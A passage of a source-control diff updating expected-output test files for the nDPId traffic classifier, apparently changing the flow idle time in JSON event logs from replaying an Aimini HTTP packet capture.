{"4":"DPI"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} 00547{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":16,"source":"afp.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":16,"total-skipped-flows":0,"total-l4-data-len":162,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1643275952364} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 16/16 diff --git a/test/results/aimini-http.pcap.out b/test/results/aimini-http.pcap.out index 44d4aa680..2ba169648 100644 
--- a/test/results/aimini-http.pcap.out +++ b/test/results/aimini-http.pcap.out 
@@ -1,29 +1,29 @@ 00462{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"aimini-http.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"aimini-http.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1614860228394} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229383,"flow_last_seen":1614860229383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229383,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614860229383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229383,"pkt":"5kBKB+riApXG95NLCABFAAAwBPkAAIAGAAAKZQACCmYAAm9VAFCbu4XRAAAAAHACgAEU8QAAAgQFtAMDAQA="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614860229383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229383,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBPkAAH8GIgEKZQACCmYAAm9VAFCbu4XRAAAAAHACgAFeHQAAAgQFtAMDAQA="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614860229384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229384,"pkt":"WgXZu6TVApXG95WRCABFAAAwBQQAAIAGAAAKZgACCmUAAgBQb1Wbu5n7m7uF0nASgAEU8QAAAgQFtAMDAQA="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229383,"flow_last_seen":1614860229384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":595,"flow_tot_l4_payload_len":595,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1614860229384,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229385,"flow_last_seen":1614860229385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229385,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614860229385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229385,"pkt":"5kBKB+riApXG95NLCABFAAAwBP8AAIAGAAAKZQACCmYAAm9WAFCbu7tlAAAAAHACgAEU8QAAAgQFtAMDAQA="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614860229386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229386,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBP8AAH8GIfsKZQACCmYAAm9WAFCbu7tlAAAAAHACgAEoiAAAAgQFtAMDAQA="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614860229386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229386,"pkt":"WgXZu6TVApXG95WRCABFAAAwBQ0AAIAGAAAKZgACCmUAAgBQb1abu8Cxm7u7ZnASgAEU8QAAAgQFtAMDAQA="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229385,"flow_last_seen":1614860229386,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":524,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1614860229386,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229388,"flow_last_seen":1614860229388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229388,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614860229388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229388,"pkt":"5kBKB+riApXG95NLCABFAAAwBREAAIAGAAAKZQACCmYAAm9XAFCbu+drAAAAAHACgAEU8QAAAgQFtAMDAQA="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBREAAH8GIekKZQACCmYAAm9XAFCbu+drAAAAAHACgAH8gAAAAgQFtAMDAQA="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"WgXZu6TVApXG95WRCABFAAAwBRkAAIAGAAAKZgACCmUAAgBQb1ebu+vKm7vnbHASgAEU8QAAAgQFtAMDAQA="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229388,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229389,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1614860229389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"5kBKB+riApXG95NLCABFAAAwBRcAAIAGAAAKZQACCmYAAm9YAFCbu\/hqAAAAAHACgAEU8QAAAgQFtAMDAQA="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229390,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBRcAAH8GIeMKZQACCmYAAm9YAFCbu\/hqAAAAAHACgAHrgAAAAgQFtAMDAQA="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229390,"pkt":"WgXZu6TVApXG95WRCABFAAAwBSIAAIAGAAAKZgACCmUAAgBQb1ibu\/tYm7v4a3ASgAEU8QAAAgQFtAMDAQA="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":542,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1614860229383,"flow_last_seen":1614860229388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60714,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} 
-00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1614860229385,"flow_last_seen":1614860229388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":3194,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1614860229388,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13568,"flow_avg_l4_payload_len":452,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229383,"flow_last_seen":1614860229383,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229383,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614860229383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229383,"pkt":"5kBKB+riApXG95NLCABFAAAwBPkAAIAGAAAKZQACCmYAAm9VAFCbu4XRAAAAAHACgAEU8QAAAgQFtAMDAQA="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614860229383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229383,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBPkAAH8GIgEKZQACCmYAAm9VAFCbu4XRAAAAAHACgAFeHQAAAgQFtAMDAQA="} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614860229384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229384,"pkt":"WgXZu6TVApXG95WRCABFAAAwBQQAAIAGAAAKZgACCmUAAgBQb1Wbu5n7m7uF0nASgAEU8QAAAgQFtAMDAQA="} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229383,"flow_last_seen":1614860229384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":595,"flow_tot_l4_payload_len":595,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1614860229384,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229385,"flow_last_seen":1614860229385,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229385,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614860229385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229385,"pkt":"5kBKB+riApXG95NLCABFAAAwBP8AAIAGAAAKZQACCmYAAm9WAFCbu7tlAAAAAHACgAEU8QAAAgQFtAMDAQA="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614860229386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229386,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBP8AAH8GIfsKZQACCmYAAm9WAFCbu7tlAAAAAHACgAEoiAAAAgQFtAMDAQA="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614860229386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229386,"pkt":"WgXZu6TVApXG95WRCABFAAAwBQ0AAIAGAAAKZgACCmUAAgBQb1abu8Cxm7u7ZnASgAEU8QAAAgQFtAMDAQA="} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229385,"flow_last_seen":1614860229386,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":524,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1614860229386,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229388,"flow_last_seen":1614860229388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229388,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614860229388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229388,"pkt":"5kBKB+riApXG95NLCABFAAAwBREAAIAGAAAKZQACCmYAAm9XAFCbu+drAAAAAHACgAEU8QAAAgQFtAMDAQA="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614860229389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBREAAH8GIekKZQACCmYAAm9XAFCbu+drAAAAAHACgAH8gAAAAgQFtAMDAQA="} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614860229389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"WgXZu6TVApXG95WRCABFAAAwBRkAAIAGAAAKZgACCmUAAgBQb1ebu+vKm7vnbHASgAEU8QAAAgQFtAMDAQA="} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229388,"flow_last_seen":1614860229389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Aimini.HTTP","breed":"Acceptable","category":"Web"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229389,"flow_last_seen":1614860229389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1614860229389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"5kBKB+riApXG95NLCABFAAAwBRcAAIAGAAAKZQACCmYAAm9YAFCbu\/hqAAAAAHACgAEU8QAAAgQFtAMDAQA="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1614860229390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229390,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBRcAAH8GIeMKZQACCmYAAm9YAFCbu\/hqAAAAAHACgAHrgAAAAgQFtAMDAQA="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1614860229390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229390,"pkt":"WgXZu6TVApXG95WRCABFAAAwBSIAAIAGAAAKZgACCmUAAgBQb1ibu\/tYm7v4a3ASgAEU8QAAAgQFtAMDAQA="} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":542,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
